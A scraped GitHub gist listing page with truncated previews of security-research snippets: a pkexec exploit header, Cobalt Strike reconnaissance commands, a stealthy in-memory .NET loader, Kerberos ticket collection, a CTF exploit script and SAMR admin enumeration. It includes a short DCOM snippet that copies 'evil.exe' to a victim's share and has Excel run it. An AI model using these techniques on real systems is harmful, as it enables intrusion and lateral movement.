Topher Timzen tophertimzen
darrenmartyn
/ pkexec.c
Created
January 26, 2022 08:55
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * For original see haxx.in/files/blasty-vs-pkexec.c | |
| * | |
| * this version is just using some awful hack to | |
| * avoid having to call gcc on the target box. | |
| * this versions fragile - must be named payload.so | |
| * might add better detection later, whatever. | |
| * all credit to bl4sty for the actual exploit, | |
| * I just made some changes for my usecase. | |
| * you will have to change the interp for diff |
HarmJ0y
/ cobaltstrike_sa.txt
Created
September 28, 2018 22:22
Cobalt Strike Situational Awareness Commands
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows version: | |
| reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion | |
| Users who have authed to the system: | |
| ls C:\Users\ | |
| System env variables: | |
| reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment | |
| Saved outbound RDP connections: |
mattifestation
/ UEFISecDatabaseParser.ps1
Last active
May 7, 2025 18:06
Parses signature data from the pk, kek, db, and dbx UEFI variables.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-UEFIDatabaseSigner { | |
| <# | |
| .SYNOPSIS | |
| Dumps signature or hash information for whitelisted ('db' variable) or blacklisted ('dbx' variable) UEFI bootloaders. | |
| .DESCRIPTION | |
| Author: Matthew Graeber (@mattifestation) | |
| License: BSD 3-Clause |
mattifestation
/ LoadInMemoryModule.ps1
Created
March 30, 2018 18:01
A stealthier method of loading a .NET PE in memory - via the Assembly.LoadModule method
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Domain = [AppDomain]::CurrentDomain | |
| $DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly') | |
| $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) | |
| $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule') | |
| # Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into. | |
| $ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll') | |
| $TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public) | |
| $TypeBuilder.CreateType() | |
| $HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| #ifdef _MSC_VER | |
| #include <intrin.h> /* for rdtscp and clflush */ | |
| #pragma optimize("gt",on) | |
| #else | |
| #include <x86intrin.h> /* for rdtscp and clflush */ | |
| #endif |
hashbrowncipher
/ dmesg_rick.c
Created
October 10, 2017 23:32
https://twitter.com/jessfraz/status/917850864018165761
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <linux/hrtimer.h> | |
| #include <linux/module.h> | |
| #include <linux/kernel.h> | |
| static struct hrtimer timer; | |
| enum hrtimer_restart yell_rick( struct hrtimer *timer ) | |
| { | |
| ktime_t time; | |
| printk(KERN_INFO "I turned myself into a logger morty! I'm dmesg RIIIICK!\n"); |
jaredcatkinson
/ Get-KerberosTicketGrantingTicket.ps1
Last active
May 8, 2025 13:00
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-KerberosTicketGrantingTicket | |
| { | |
| <# | |
| .SYNOPSIS | |
| Gets the Kerberos Tickets Granting Tickets from all Logon Sessions | |
| .DESCRIPTION | |
| Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets. |
rxwx
/ foxprow.ps1
Last active
September 14, 2017 15:06
DCOM binary planting via Excel.Application.ActivateMicrosoftApp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "192.168.1.111")) | |
| # Windows 10 specific, but searches PATH so .. | |
| copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE | |
| $excel.ActivateMicrosoftApp("5") | |
| # excel executes your binary :) |
aagallag
/ pwnmegan35.py
Last active
November 5, 2017 04:26
Writeup for CTF challenge: https://b0tchsec.com/2017/sha2017/megan-35
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| import base64 | |
| from pwn import * | |
| HOST='megan35.stillhackinganyway.nl' | |
| PORT='3535' | |
| REMOTE=True | |
| DEBUG=False | |
| FNAME='./megan-35' |
ropnop
/ lookupadmins.py
Last active
February 10, 2025 16:53
Python script using Impacket to enumerate local administrators over SAMR
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # | |
| # Title: lookupadmins.py | |
| # Author: @ropnop | |
| # Description: Python script using Impacket to query members of the builtin Administrators group through SAMR | |
| # Similar in function to Get-NetLocalGroup from Powerview | |
| # Won't work against Windows 10 Anniversary Edition unless you already have local admin | |
| # See: http://www.securityweek.com/microsoft-experts-launch-anti-recon-tool-windows-10-server-2016 | |
| # | |
| # Heavily based on original Impacket example scripts written by @agsolino and available here: https://github.com/CoreSecurity/impacket |
NewerOlder